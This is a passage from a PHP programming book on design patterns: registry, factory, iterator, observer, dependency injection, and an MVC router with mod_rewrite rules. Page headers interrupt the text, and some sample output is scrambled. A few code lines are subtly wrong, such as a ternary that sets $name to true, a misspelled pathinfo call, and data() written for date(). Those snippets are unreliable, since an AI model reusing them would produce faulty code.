* @throws Exception
*/
static public function get($name)
{
if (!self::contains($name)) {
throw new Exception("Object does not exist in registry");
}
return self::$_store[$name];
}
133
134
PHP Master: Write Cutting-edge Code
/**
* Check if an object is in the registry
*
* @param string $name Object name, {@see self::set()}
* @return bool
*/
static public function contains($name)
{
if (!isset(self::$_store[$name])) {
return false;
}
return true;
}
/**
* Remove an object from the registry
*
* @param string $name Object name, {@see self::set()}
* @returns void
*/
static public function remove($name)
{
if (self::contains($name)) {
unset(self::$_store[$name]);
}
}
}
Once we have our Registry class, we can use it in one of two ways: externally, or
internally. Let’s look at the code for a database connection using both methods.
First, externally: as consumers of the database class, we’ll instantiate an instance
and add it to our registry:
chapter_04/Registry-DB-external.php
$read = new DBReadConnection;
Registry::set($read);
$write = new DBWriteConnection;
Registry::set($write);
Design Patterns
// To get the instances, anywhere in our code:
$read = Registry::get('DbReadConnection');
$write = Registry::get('DbWriteConnection');
In this instance, we use the shortcut of not passing in the name, and can then pull
the object from the registry using the class name. This means the object is available
anywhere the Registry class is accessible.
The second method, internally, refers to code similar to that used with our singleton
pattern; it uses the Registry to store and retrieve the different connections inside
the class itself. The consumer doesn’t interact with the Registry directly:
chapter_04/Registry-DB-internal.php
abstract class DBConnection extends PDO {
static public function getInstance($name = null)
{
// Get the late-static-binding version of __CLASS__
$class = get_called_class();
// Allow passing in a name to get multiple instances
// If you do not pass a name, it functions as a singleton
$name = (!is_null($name)) ?: $class;
if (!Registry::contains($name)) {
$instance = new $class();
Registry::set($instance, $name);
}
return Registry::get($name);
}
}
class DBWriteConnection extends DBConnection {
public function __construct()
{
parent::__construct(APP_DB_WRITE_DSN, APP_DB_WRITE_USER,➥
APP_DB_WRITE_PASSWORD);
}
}
class DBReadConnection extends DBConnection {
public function __construct()
{
parent::__construct(APP_DB_READ_DSN, APP_DB_READ_USER,➥
135
136
PHP Master: Write Cutting-edge Code
APP_DB_READ_PASSWORD);
}
}
With this code, and a sprinkling of late static binding goodness,1 we can have our
abstract parent with the shared code, while allowing for multiple, completely separate instances as needed. To utilize our code, we just call
DBConnection::getInstance() on either of the read or write connection classes,
like so:
// Get the singleton Read connection
$read_db = DBReadConnection::getInstance();
// Get the singleton Write connection
$write_db = DBWriteConnection::getInstance();
// Get a new DBReadConnection for another purpose
$news_db = DBReadConnection::getInstance(‘news-db’);
In some ways, this is a mixture of the singleton pattern and our next pattern: the
factory pattern.
Registering Some Problems
Each of these ways of using the registry has its own issues. With the external registry, you cannot lazy load; that is, you must initialize each object in the registry
before it’s needed. If your order of operations becomes complex, you will miss
this and hit unexpected errors.
With the internal method, you need to consider constructor arguments—if you
don’t pass them through, you’ll have the exact same object each time; just different
instances of it.
1
Late static binding was a feature introduced with PHP 5.3. It allows us to inherit static methods from
a parent class, and to reference the child class being called. This means you can have an abstract class
with static methods, and reference the child class’s concrete implementations by using the
static::method() notation instead of the self::method().
Design Patterns
Factory
The factory pattern manufactures objects, just like its steel-and-concrete namesake
in the world of industry. Typically, it is used to instantiate different concrete implementations of the same abstract class or interface.
While it is rarely employed in a generic manner, the factory pattern is perfect for
instantiating one of many variants in a driver-based setup, such as different storage
engines for your configuration, sessions, or cache. The biggest value in the factory
pattern is that it can encapsulate what would normally be a lot of object setup into
a single, simple method call. For example, when setting up a logger object, you need
to set up the log type (file-based, MySQL, or SQLite, for example), log location, and,
potentially, items like credentials.
The factory pattern is used to augment the new operator when you’re instantiating
objects, and lets you unify the complexities that might occur in setting up an object,
or many types of similar objects:
chapter_04/Factory.php
/**
* Log Factory
*
* Setup and return a file, mysql, or sqlite logger
*/
class Log_Factory {
/**
* Get a log object
*
* @param string $type The type of logging backend, file,➥
mysql or sqlite
* @param array $options Log class options
*/
public function getLog($type = 'file', array $options)
{
// Normalize the type to lowercase
$type = strtolower($type);
// Figure out the class name and include it
$class = "Log_" .ucfirst($type);
require_once str_replace('_', DIRECTORY_SEPARATOR, $class) .➥
'.php';
137
138
PHP Master: Write Cutting-edge Code
// Instantiate the class and set the appropriate options
$log = new $class($options);
switch ($type) {
case 'file':
$log->setPath($options['location']);
break;
case 'mysql':
$log->setUser($options['username']);
$log->setPassword($options['password']);
$log->setDBName($options['location']);
break;
case 'sqlite':
$log->setDBPath($options['location']);
break;
}
return $log;
}
}
With a minor change—say, adding an extra argument to the getLog() method—you
can easily add the resulting object to your Registry, and reap the benefits of not
instantiating these objects over and over again.
Iterator
One of the most useful features of PHP is the foreach construct. With foreach, we
can easily iterate (loop over) array values and object properties. The iterator pattern
allows us to add this foreach-able ability to any object’s internal data store, not just
its public properties. It overrides the default foreach behavior, and allows us to
inject business logic into that loop.
It is not uncommon to have an object that represents both the business logic—for
example, basic CRUD (create, read, update, and delete, the four fundamental database
interaction functions)—and storage of a dataset. The iterator pattern allows you to
expose the internal storage of that data for simple iteration. It is actually implemented
in internal classes built into PHP—SimpleXMLElement, DomNodeList, PDOStatement,
and others. The iterator class provided by SPL—the Standard PHP Library (see
Appendix B)—is the internal iterator implementation, and can be used to implement
the iterator pattern in your own code. This means that at the core of your iterators,
you have a blazingly fast C-based implementation. There are many types of iterat-
Design Patterns
ors—so many, in fact, that any talk at a conference on SPL turns into a drinking
game around the word!
■ Iterator—the basic iterator
■ IteratorAggregate—an object that can provide an iterator, but is not itself an
iterator
■ RecursiveIteratorIterator—used to iterate over RecursiveIterators
■ FilterIterator—an iterator that filters the data, only returning items that match
the filter
■ RegexIterator—a built-in concrete implementation of FilterIterator that
uses regular expressions as the filter
■ MultipleIterator—an iterator that will iterate over multiple iterators, one after
the other
■ LimitIterator —a filter that can limit its iteration to a subset of its data (similar
to LIMIT, OFFSET, and COUNT in SQL; see Chapter 2)
The list goes on …
We’ll start with the iterator itself. The iterator is best understood if you have a firm
knowledge of how arrays are iterated in PHP. First, let’s refresh ourselves with an
actual foreach construct:
chapter_04/IteratorExplanation.php (exception)
$array = array("Hello", "World");
foreach ($array as $key => $value) {
echo '<pre>'. $key .': ' .$value . '</pre>'. PHP_EOL;
}
The output from this simple script is:
0: Hello
1: World
139
140
PHP Master: Write Cutting-edge Code
All the actions that PHP performs internally are available as functions, so we can
actually write our own foreach using a do/while loop:
chapter_04/IteratorExplanation.php (exception)
$array = array("Hello", "World");
reset($array);
do {
echo '<pre>'.key($array) .': '. current($array) .'</pre>'.➥
PHP_EOL;
} while (next($array));
As you can see here, first we call the reset() method to reset the iteration. Then,
inside our while condition, we call next()—this returns false if we’ve reached the
end of our array, otherwise it returns true, and increments the internal pointer. Finally, we call key() and current(), which return the key and value, respectively,
for the current position of the internal pointer. The output from this script is
identical to our foreach construct.
Now let’s look at the iterator interface (note that the interface uses rewind(), not
reset()):
interface Iterator extends Traversable {
public function current ();
public function key();
public function next();
public function rewind();
public function valid();
}
The iterator introduces the valid() method, which is called in conjunction with
next(). The next() method is called simply to advance the pointer, while the
valid() method is responsible for returning the true/false result that the internal
next() function returns.
Let’s look at our previous example, using an iterator:
Design Patterns
chapter_04/Iterator.php (excerpt)
class BasicIterator implements Iterator {
private $key = 0;
private $data = array(
"hello",
"world",
);
public function __construct() {
$this->key = 0;
}
public function rewind() {
$this->key = 0;
}
public function current() {
return $this->data[$this->key];
}
public function key() {
return $this->key;
}
public function next() {
$this->key++;
return true;
}
public function valid() {
return isset($this->data[$this->key]);
}
}
In this iterator, our simple array is now assigned to the BasicIterator->data
property. This property is protected, and therefore not accessible directly—we must
use the methods of the class to iterate and access that data:
chapter_04/Iterator.php (excerpt)
$iterator = new BasicIterator();
$iterator->rewind();
141
142
PHP Master: Write Cutting-edge Code
do {
$key = $iterator->key();
$value = $iterator->current();
echo '<pre>'. $key .': ' .$value . '</pre>'. PHP_EOL;
} while ($iterator->next() && $iterator->valid());
As you can see, we simply create our BasicIterator instance, and then call the
rewind(), next(), valid(), key(), and current() methods, instead of the internal
functions. Again, the output is identical to our foreach construct.
Finally, let’s look at using our iterator with foreach:
chapter_04/Iterator.php (excerpt)
$iterator = new BasicIterator();
foreach ($iterator as $key => $value) {
echo '<pre>'. $key .': ' .$value . '</pre>'. PHP_EOL;
}
Once again, we receive identical output. And while this example is fairly simplistic,
there is nothing to say that our data must be a simple array—it could be a database
result that’s being fetched as it’s iterated (this is what PDOStatement->fetch()
does), or results for a web service … anything.
One of the best concepts within the iterator design pattern is the OuterIterator,
which is a proxy for an actual iterator. To the outside world, the OuterIterator is
itself the iterator, but, in fact, it simply proxies the calls to an internal iterator. This
allows it to wrap extra functionality around the iteration without the knowledge of
the internal iterator.
OuterIterators are an ideal example of another pattern—the proxy pattern. If you
couple this with the ArrayIterator class, you can use any array as the internal
iterator, and generate an object with exactly the same iteration behavior as an array.
Another great aspect of iterators is recursion. Recursive iterators often seem to trip
people up, as many developers do not understand the difference between
2
RecursiveIterator and RecursiveIteratorIterator.
2
RecursiveIteratorIterator is one of many OuterIterators.
Design Patterns
The relationship between these two classes is simple; RecursiveIterator is our
data structure—an iterator whose data contains other iterators. The purpose of
RecursiveIterator is to provide a standard way of checking if there are child
iterators for each iteration. This is done with the hasChildren() and getChildren()
methods.
The RecursiveIteratorIterator, however, is for actually iterating over the data
structure; it calls the hasChildren() and, if necessary, getChildren() methods,
and iterates over the children also. This means you can use a simple foreach for
iterating over nested structures (how many times have you had to nest multiple
foreach constructs?).
Let’s look at a simple example using the built-in RecursiveArrayIterator, which
will check each element of the array to see if it is also an array, and if so, recursively
iterate over it:
chapter_04/RecursiveIterator.php
$array = array(
"Hello", // Level 1
array(
"World" // Level 2
),
array(
"How", // Level 2
array(
"are", // Level 3
"you" // Level 3
)
),
"doing?" // Level 1
);
$recursiveIterator = new RecursiveArrayIterator($array);
$recursiveIteratorIterator = new RecursiveIteratorIterator➥
($recursiveIterator);
foreach ($recursiveIteratorIterator as $key => $value) {
echo '<pre>Depth: ' . $recursiveIteratorIterator->getDepth() .➥
'</pre>' . PHP_EOL;
143
144
PHP Master: Write Cutting-edge Code
echo '<pre>Key: ' . $key . '</pre>' . PHP_EOL;
echo '<pre>Value: ' .$value . '</pre>' . PHP_EOL;
}
So, with only one level of foreach, we can recurse over every level of our threelevel multi-dimensional array:
Depth:
Key: 0
Value:
Depth:
Key: 0
Value:
Depth:
Key: 0
Value:
Depth:
Key: 0
Value:
Depth:
Key: 1
Value:
Depth:
Key: 3
Value:
0
Hello
1
World
1
How
2
are
2
you
0
doing?
This makes recursion over tree data structures super-easy.
Moving on to some more complicated iterators, the first on the list is
FilterIterator. The FilterIterator is an abstract class that must be extended,
and does exactly as you would expect: it filters the iteration, skipping values that
fall short of meeting the filter criteria. FilterIterator works by adding a simple
accept() method that must return a Boolean indicating if the current iteration is
acceptable or not. This is called in addition to next() and valid() on each iteration.
If false is returned, the iteration is skipped.
Here we’ll create a filter that will only accept the even-keyed values:
Design Patterns
chapter_04/FilterIterator.php
class EvenFilterIterator extends FilterIterator {
/**
* Accept only even-keyed values
*
* @return bool
*/
public function accept()
{
// Get the actual iterator
$iterator = $this->getInnerIterator();
// Get the current key
$key = $iterator->key();
// Check for even keys
if ($key % 2 == 0) {
return true;
}
return false;
}
}
$array
0 =>
1 =>
2 =>
3 =>
4 =>
5 =>
6 =>
7 =>
);
= array(
"Hello",
"Everybody Is",
"I'm",
"Amazing",
"The",
"Who",
"Doctor",
"Lives"
// Create an iterator from our array
$iterator = new ArrayIterator($array);
// Create our FilterIterator
$filterIterator = new EvenFilterIterator($iterator);
// Iterate
145
146
PHP Master: Write Cutting-edge Code
foreach ($filterIterator as $key => $value) {
echo '<pre>' . $key .': '. $value . '</pre>' . PHP_EOL;
}
Bear in mind that we’ve not changed the functionality of the ArrayIterator—this
is key to the concept of using FilterIterator. It also means we could create an
OddFilterIterator to accept odd-keyed values, or a StepFilterIterator, which
would accept an argument every “n” values.
The output from our previous code is this:
0:
2:
4:
6:
Hello
I'm
The
Doctor
Notice it only outputs keys 0, 2, 4, and 6. You can filter the key or the value, and
you can set up your accept() logic according to your application needs.
Another similar iterator is the RegexIterator—it actually extends FilterIterator,
and its accept() method performs a regular expression against the current value.
If the value matches the regular expression, it is accepted. We can use RegexIterator
to do some cool stuff, such as using it with RecursiveDirectoryIterator to find
all PHP files:
chapter_04/RegexIterator.php
// Create a RecursiveDirectoryIterator
$directoryIterator = new RecursiveDirectoryIterator("./");
// Create a RecursiveIteratorIterator to recursively iterate
$recursiveIterator = new RecursiveIteratorIterator➥
($directoryIterator);
// Create a filter for PHP files
$regexFilter = new RegexIterator($recursiveIterator, '/(.*?)\.➥
(php|phtml|php3|php4|php5)$/');
// Iterate
foreach ($regexFilter as $key => $file) {
Design Patterns
/* @var SplFileInfo $file */
echo $file->getFilename() . PHP_EOL;
}
The output from this script will list all the files with either a .php, .phtml, .php3,
.php4 or .php5 file extension in the current working directory.
Another similar iterator is the LimitIterator. As we mentioned earlier, this works
like the LIMIT clause in SQL:
chapter_04/LimitIterator.php
// Define the array
$array = array(
'Hello',
'World',
'How',
'are',
'you',
'doing?'
);
// Create the iterator
$iterator = new ArrayIterator($array);
// Create the limiting iterator, to get the first 2 elements
$limitIterator = new LimitIterator($iterator, 0, 2);
// Iterate
foreach ($limitIterator as $key => $value) {
echo '<pre>' . $key .': '. $value . '</pre>' . PHP_EOL;
}
This will output just the first two elements in the array:
0: Hello
1: World
Because of the proxy nature of the OuterIterator concept, we can actually stack
them—and this really shows the power of iterators. In this example, we’ll combine
our RecursiveIteratorIterator and our LimitIterator:
147
148
PHP Master: Write Cutting-edge Code
chapter_04/StackedOuterIterators.php
$array = array(
"Hello", // Level 1
array(
"World" // Level 2
),
array(
"How", // Level 2
array(
"are", // Level 3
"you" // Level 3
)
),
"doing?" // Level 1
);
// Create our Recursive data structure
$recursiveIterator = new RecursiveArrayIterator($array);
// Create our recursive iterator
$recursiveIteratorIterator = new RecursiveIteratorIterator➥
($recursiveIterator);
// Create a limit iterator
$limitIterator = new LimitIterator($recursiveIteratorIterator,➥
2, 5);
// Iterate
foreach ($limitIterator as $key => $value) {
$innerIterator = $limitIterator->getInnerIterator();
echo '<pre>Depth: ' .$innerIterator->getDepth() . '</pre>' .➥
PHP_EOL;
echo '<pre>Key: ' .$key . '</pre>' . PHP_EOL;
echo '<pre>Value: ' .$value . '</pre>' . PHP_EOL;
}
In this case, because the RecursiveIteratorIterator in effect flattens the multidimensional structure, the limit is applied to the flattened data. If this were a family
tree represented as an array, for instance, we could use the LimitIterator to display
the great-grandparents on the mother’s side of the family. In any case, here’s our
output:
Design Patterns
Depth:
Key: 0
Value:
Depth:
Key: 0
Value:
Depth:
Key: 1
Value:
Depth:
Key: 3
Value:
1
How
2
are
2
you
0
doing?
The iterator pattern is one of the most versatile and useful patterns in PHP. This
versatility is due in part to the role arrays play as the primary data structure in PHP.
With internal support for iterators, they are fast, flexible, easy to understand, and
even easier to use.
By using the OuterIterator, we can reuse and expand the behavior of our code
with ease, in a pure object oriented way. This is, frankly, very cool!
Observer
The observer pattern is one that many JavaScript developers are familiar with. This
pattern is employed in JavaScript by what you’d know as events.
The basis of the observer pattern is that it allows your application to register callbacks
to be triggered when specific events occur. In JavaScript, these consist of actions
such as clicking (onclick), page loading (onload), or when the mouse moves over
an item (onmouseover). Obviously, in PHP, there is no mouse, so these events don’t
apply—in fact, the events you need to target are going to be specific to your application’s needs.
For example, you might want to add an event for the saving of data. With a “save
data” trigger, you can register callbacks to clear your cache and update a log. Another
event could be data deletion. For this you might register the clear cache and log,
and use another callback to delete child data.
The observer is one of the simplest and most flexible patterns. We can implement
it using a class called Event; this class has two public methods:
149
150
PHP Master: Write Cutting-edge Code
■ registerCallback(): this method allows you to attach any number of callbacks
to an event with a given name
■ trigger()—this method will trigger the event named above, and call any callbacks registered for it
chapter_04/Event.php
/**
* The Event Class
*
* With this class you can register callbacks that will
* be called (FIFO) for a given event.
*/
class Event {
/**
* @var array A multi-dimentional array of events => callbacks
*/
static protected $callbacks = array();
/**
* Register a callback
*
* @param string $eventName Name of the triggering event
* @param mixed $callback An instance of Event_Callback or➥
a Closure
*/
static public function registerCallback($eventName, $callback)
{
if (!is_callable($callback)) {
throw new Exception("Invalid callback!");
}
$eventName = strtolower($eventName);
self::$callbacks[$eventName][] = $callback;
}
/**
* Trigger an event
*
* @param string $eventName Name of the event to be triggered
* @param mixed $data The data to be sent to the callback
*/
static public function trigger($eventName, $data)
Design Patterns
{
$eventName = strtolower($eventName);
if (isset(self::$callbacks[$eventName])) {
foreach (self::$callbacks[$eventName] as $callback) {
// The callback is either a closure, or an object➥
that defines __invoke()
$callback($data);
}
}
}
}
The callbacks are then stored in the static protected Event::$callbacks property
as a multi-dimensional array keyed on the event name. This array looks like:
array(
'eventname' => array(
'callback 1',
'callback 2',
),
)
When an event is triggered we simply iterate on the Event::$callbacks sub-array
for the event, calling each callback in order. To utilize this pattern, first we’ll define
a class that represents part of our data layer, MyDataRecord. This class has a save()
method that, when called, will trigger a save event:
chapter_04/MyDataRecord.php
class MyDataRecord {
public function save()
{
// Actually save data here
// Trigger the save event
Event::trigger('save', array("Hello", "World"));
}
}
We pass in the name of the event (save) and some data that will be passed to a
callback. Next we register our triggers. First we’re going to create a callback to log
151
152
PHP Master: Write Cutting-edge Code
the event by implementing the __invoke() magic method (this method is called
automatically when you try to use an object as a function). Once we have created
the callback, we register it using Event::registerCallback() using the same event
name, save.
chapter_04/LogCallback.php
/**
* Logger callback
*/
class LogCallback {
public function __invoke($data)
{
echo "Log Data" . PHP_EOL;
var_dump($data);
}
}
// Register the log callback
Event::registerCallback('save', new LogCallback());
We’ll also register a second callback, this time to clear the cache. For this we’ll use
a closure, also known as an anonymous function:
// Register the clear cache callback as a closure
Event::registerCallback('save', function ($data) {
echo "Clear Cache" . PHP_EOL;
var_dump($data);
});
Now, whenever we call the MyDataRecord->save() method, both our callbacks will
be brought into action. These functions are called using the FIFO technique—First
In, First Out. This means the log callback will be called first, followed by the clear
cache callback:
// Instantiate a new data record
$data = new MyDataRecord();
$data->save(); // 'save' Event is triggered here
Calling this code will display:
Design Patterns
Log Data
array(2) {
[0]=>
string(5)
[1]=>
string(5)
}
Clear Cache
array(2) {
[0]=>
string(5)
[1]=>
string(5)
}
"Hello"
"World"
"Hello"
"World"
Going beyond a simple save, you might want to have a pre-save and post-save event;
perhaps you have validation of input on pre-save, and a log of the save itself in the
post-save.
Dependency Injection
The dependency injection pattern is the act of allowing the consumer of a class to
inject dependencies. Typically, these take the form of objects, closures, or callbacks
that fulfill requirements necessary for the class to perform its intended actions.
Think of dependency injection like supplying the batteries for your Wii Remote.
Nintendo doesn’t care if you use Duracell or Energizer, or whether it’s made of
lithium, NiMH, NiCad, or plain old alkaline; what it does care about is that you
meet the vital technical requirements: size AA and 1.5V.
Dependency injection can be used wherever you have interdependencies in your
code. For example, it might be your database connection, your HTTP client for web
services, or wrappers around system binaries you need to call cross-platform. Dependency injection is one of the simplest patterns. For each dependency, you specify
a setter method (and it’s nice if you add a getter too!) that will accept an argument
that’s able to fulfill the dependency requirement.
Let’s take a look at rewriting our log factory using dependency injection instead.
First, our Log class itself, with a setDataStore() method:
153
154
PHP Master: Write Cutting-edge Code
chapter_04/DependencyInjection.php (excerpt)
/**
* Log Class
*/
class Log {
/**
* @var Log_Engine_Interface
*/
protected $engine = false;
/**
* Add an event to the log
*
* @param string $message
*/
public function add($message)
{
if (!$this->engine) {
throw new Exception('Unable to write log. No Engine set.');
}
$data['datetime'] = time();
$data['message'] = $message;
$session = Registry::get('session');
$data['user'] = $session->getUserId();
$this->engine->add($data);
}
/**
* Set the log data storage engine
*
* @param Log_Engine_Interface $Engine
*/
public function setEngine(Log_Engine_Interface $engine)
{
$this->engine = $engine;
}
/**
* Retrieve the data storage engine
*
* @return Log_Engine_Interface
Design Patterns
*/
public function getEngine()
{
return $this->engine;
}
}
Now we can use our new Log class, and pass in whichever data storage engine we
wish to use. First, we need an interface to ensure every driver meets our requirements. This could also be an abstract class; by type hinting on the interface or class,
we’re ensuring that our requirements are met—in this case, an add() method, intended to add an event to the log:
chapter_04/DependencyInjection.php (excerpt)
interface Log_Engine_Interface {
/**
* Add an event to the log
*
* @param string $message
*/
public function add(array $data);
}
Now that we know what we need to conform to, let’s define our first engine. We’ll
start with the simplest—file-based storage:
chapter_04/DependencyInjection.php (excerpt)
class Log_Engine_File implements Log_Engine_Interface {
/**
* Add an event to the log
*
* @param string $message
*/
public function add(array $data)
{
$line = '[' .data('r', $data['datetime']). '] ' .➥
$data['message']. ' User: ' .$data['user'] . PHP_EOL;
$config = Registry::get('site-config');
if (!file_put_contents($config['location'], $line,➥
155
156
PHP Master: Write Cutting-edge Code
FILE_APPEND)) {
throw new Exception("An error occurred writing to file.");
}
}
}
With that done, in our application we can now call our Log class:
chapter_04/DependencyInjection.php (excerpt)
$engine = new Log_Engine_File();
$log = new Log();
$log->setEngine($engine);
// Add it to the registry
Registry::add($log);
What’s great about dependency injection is that unlike the factory pattern, our Log
class requires no knowledge about each of the different storage engines. This means
that any developer utilizing our log class can add their own storage engines—so
long as they conform to the interface. Start simple, such as with file-based storage
for our logging class, and build up as requirements change.
Model-View-Controller
The model-view-controller, or MVC pattern, is a way of describing the relationship
between three different layers of an application. The architecture consists of:
Model—data layer
All input ultimately ends up being pushed to the
model, and all output data comes from the model.
This could be a database, web services, or files.
View—presentation layer
This is where data is taken from the model and
output to the user. Pages and forms are also generated here.
Controller—application flow
layer
The controller is where it’s determined what the
user is trying to do, based on the user’s request.
The model is then used to perform the requested
action and retrieve the requested data. Finally,
Design Patterns
the view is called to display the results of the action to the user.
The MVC pattern is not so much about implementing functionality; rather, it’s
concerned with the way your application is structured. By separating out the components of MVC, you provide a flexible framework for your code. The separation
of business logic from display logic allows you to send the same data, whether it’s
an HTML table or a JSON response. This separation is, in some ways, similar to the
separation that front-end developers apply between content and style with semantic
HTML and CSS.
Typically, with MVC, you’ll have a single controller for each logical section of your
application. In front of these controllers, you’ll have a Router; this is the gatekeeper
that determines what users are requesting so that the application can fulfill their
needs. Behind your controllers, you may have a plethora of models representing
different pieces of your data layer—for example, user accounts, profiles, shopping
carts … you get the idea.
Once you have interacted with the model, be it saving a user account or retrieving
their shopping cart, you’ll then pull in a template specific to the correct response
for your user. That template could be an error page if there was a problem, a form
to update the shopping cart, or a save confirmation page.
An illustration of a typical MVC architecture is shown in Figure 4.1.
157
158
PHP Master: Write Cutting-edge Code
Figure 4.1. The flowchart of a typical MVC application
The Controller
At it’s most basic, the controller need be nothing more than the reading of a GET
argument to determine the page that is to be passed, then output:
// Get the requested file (ignore any paths)
$page = basename($_GET['page']);
// Replace any extension
$ext = pathfinfo($page, PATHINFO_EXTENSION);
$page = str_replace('.' .$ext, '', $page);
Design Patterns
// Check if we need a model
if ($page == 'user-account') {
// Include the model
require_once 'user-model.php';
}
// Include the view
require_once $page . '-view.php';
Nobody wants URLs like /index.php?page=user-account&user_id=123&action=view,
though. How do you convert this to the more fancier /user-account/view/123?
The most common solution is an Apache module, mod_rewrite. This module allows
you to match URL patterns and transform them. The following Apache configuration
will allow us to handle our pretty URL:
# Turn on mod_rewrite handling
RewriteEngine On
# Allows for three wildcards: page, action and id
RewriteRule (.*?)/(.*?)/(.*?)$
index.php?page=$1&action=$2&id=$3
Then we add a simple index.php for testing:
<?php var_dump($_GET); ?>
Now we can load our desired /user-account/view/123 and we’ll see:
array
'page' => string 'user-account' (length=12)
'action' => string 'view' (length=4)
'id' => string '123' (length=3)
This allows us to have a dynamic set of URLs, but what if we don’t want to pass in
an ID? Or have more than an ID to pass in?
For example, take /photos/dshafik/5584010786/in/set-72157626290864145/, a URL
for Flickr. Replacing the values, we might end up with variables like so:
/photos/user/photoId/in/groupType-groupId/. We could continue adding a RewriteRule for every possibility, but this becomes tedious and difficult to maintain. Instead
159
160
PHP Master: Write Cutting-edge Code
of trying to handle this complexity in the limited confines of regular expressions
within mod_rewrite, we can simply hand the entire URL to PHP to work its magic:
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule !\.(js|ico|gif|jpg|png|css)$ /index.php
In this configuration, we’ve introduced a new mod_rewrite option, RewriteCond.
This new option allows you to specify conditions, which must also be met before
the RewriteRule is applied. In this case, the condition is that the requested URL is
not a real file. This is done using the REQUEST_FILENAME server variable, and the
condition !-f —. In this syntax, the exclamation point plays the same role as it does
in PHP, logical NOT, while –f means “local file.”
If we again hit our URL, we can retrieve the request string via the
$_SERVER['REQUEST_URI'] global variable:
string '/user-account/view/123' (length=22)
Once we have this, we can parse it in whichever way we like. To do this, we’ll
create a router. There are several common reasons for creating a router:
■ to allow specifying exact regular expressions
■ to support a syntax for specifying key/value pairs
■ to create a full parser with a finite structure
To make our lives easier, we’ll pursue the middle option. In this router, you can
specify either :key or type:key as placeholders in our URL structure. Supported
types are:
■ any
■ integers
■ alpha (includes dash and underscore)
■ alpha plus numeric
■ regular expression (custom pattern)
For example, we can use /photos/:user/int:photoId/in/alpha:groupType/int:groupId
to support a similar syntax to Flickr.
Design Patterns
First, we define each of our regular expression subpattern matches. We’re going to
use these to build a simple regular expression that matches our placeholders:
const
const
const
const
const
REGEX_ANY = "([^/]+?)";
REGEX_INT = "([0-9]+?)";
REGEX_ALPHA = "([a-zA-Z_-]+?)";
REGEX_ALPHANUMERIC = "([0-9a-zA-Z_-]+?)";
REGEX_STATIC = "%s";
Next we add two properties: one to hold our compiled routes, and another to hold
a base URL. This base URL makes it easy to use our router in a subfolder (that is,
/store/<our app>):
/**
* @var array The compiled routes
*/
protected $routes = array();
/**
* @var string The base URL
*/
protected $baseUrl = '';
Now we define a function to specify the base URL, and quote it for our regular expression. Because URLs are full of the default / delimiter, we’re going to use @ instead
when escaping. This makes creating our regular expressions much simpler:
/**
* Set a base URL from which all routes will be matched
*
* @param string $baseUrl
*/
public function setBaseUrl($baseUrl)
{
// Escape the base URL, with @ as our delimiter
$this->baseUrl = preg_quote($baseUrl, '@');
}
We now get into the meat of the router, adding routes. The Router->addRoute()
allows us to specify a route pattern, as well as a set of options that will be combined
with the parsed key-value pairs. Such as specifying a controller:
161
162
PHP Master: Write Cutting-edge Code
/**
* Add a new route
*
* @param string $route The route pattern
*/
public function addRoute($route, $options = array())
{
$this->routes[] = array('pattern' => $this->_parseRoute($route),➥
'options' => $options);
}
The heavy lifting for this is done in the Router->_parseRoute() method. In this
method, we use an often-overlooked feature of PCRE (Perl Compatible Regular Expressions), which allows us to name subpatterns. When using preg_match(), the
matches will be returned with both their normal indexed array keys, as well as a
named key using the subpattern name. This is similar to functions such as
mysql_fetch_array(). It’s achieved by placing ?P, followed by the name inside of
greater than/less than signs ?P<NAME> at the start of the subpattern:
/**
* Parse the route pattern
*
* @param string $route The pattern
* @return string
*/
protected function _parseRoute($route)
{
$baseUrl = $this->baseUrl;
// Short-cut for the / route
if ($route == '/') {
return "@^$baseUrl/$@";
}
// Explode on the / to get each part
$parts = explode("/", $route);
// Start our regex, we use @ instead of / to avoid➥
issues with the URL path
// Start with our base URL
$regex = "@^$baseUrl";
// Check to see if it starts with a / and discard the➥
empty arg
Design Patterns
if ($route[0] == "/") {
array_shift($parts);
}
// Foreach each part of the URL
foreach ($parts as $part) {
// Add a / to the regex
$regex .= "/";
// Start looking for type:name strings
$args = explode(":", $part);
if (sizeof($args) == 1) {
// If there's only one value, it's a static➥
string
$regex .= sprintf(self::REGEX_STATIC,➥
preg_quote(array_shift($args), '@'));
continue;
} elseif ($args[0] == '') {
// If the first value is empty, there is no➥
type specified, discard it
array_shift($args);
$type = false;
} else {
// We have a type, pull it out
$type = array_shift($args);
}
// Retrieve the key
$key = array_shift($args);
// If it's a regex, just add it to the expression➥
and move on
if ($type == "regex") {
$regex .= $key;
continue;
}
// Remove any characters that are not allowed in➥
sub-pattern names
$this->normalize($key);
// Start creating our named sub-pattern
$regex .= '(?P<' . $key . '>';
163
164
PHP Master: Write Cutting-edge Code
// Add the actual pattern
switch (strtolower($type)) {
case "int":
case "integer":
$regex .= self::REGEX_INT;
break;
case "alpha":
$regex .= self::REGEX_ALPHA;
break;
case "alphanumeric":
case "alphanum":
case "alnum":
$regex .= self::REGEX_ALPHANUMERIC;
break;
default:
$regex .= self::REGEX_ANY;
break;
}
// Close the named sub-pattern
$regex .= ")";
}
// Make sure to match to the end of the URL and make it➥
unicode aware
$regex .= '$@u';
return $regex;
}
Finally, we define a method to take our URL path, and parse it down to our route’s
key-value pairs. Once we have this, we can dispatch our controllers, and actually
perform a task for our users. You’ll notice that we unset all the numeric indices,
as they’re unnecessary—unfortunately, PHP doesn’t provide a way to ignore them:
/**
* Retrieve the route data
*
* @param string $request The request URI
* @return array
*/
public function getRoute($request)
{
$matches = array();
Design Patterns
foreach ($this->routes as $route) {
// Try to match the request against defined routes
if (preg_match($route['pattern'], $request,➥
$matches)) {
// If it matches, remove unnecessary numeric➥
indexes
foreach ($matches as $key => $value) {
if (is_int($key)) {
unset($matches[$key]);
}
}
// Merge the matches with the supplied options
$result = $matches + $route['options'];
return $result;
}
}
return false;
}
The last part of our class is a utility method for cleaning up key names for the regular
expression:
/**
* Normalize a string for sub-pattern naming
*
* @param string &$param
*/
public function normalize(&$param)
{
$param = preg_replace("/[^a-zA-Z0-9]/", "", $param);
}
}
If we now take our Router class and run it, we’ll see this:
$router = new RouterRegex;
$router->addRoute("/alpha:page/alpha:action/:id",
array('controller' => 'default'));
165
166
PHP Master: Write Cutting-edge Code
var_dump($router);
$route = $router->getRoute('/user-account/view/123');
This gives us the following output:
array(4) {
["page"]=>
string(12) "user-account"
["action"]=>
string(4) "view"
["id"]=>
string(3) "123"
["controller"]=>
string(7) "default"
}
With a more complex URL like Flickr, we might want to use a route such as:
$router->addRoute("/photos/alnum:user/int:photoId/in/regex:➥
(?P<groupType>([a-z]+?))-(?P<groupId>([0-9]+?))");
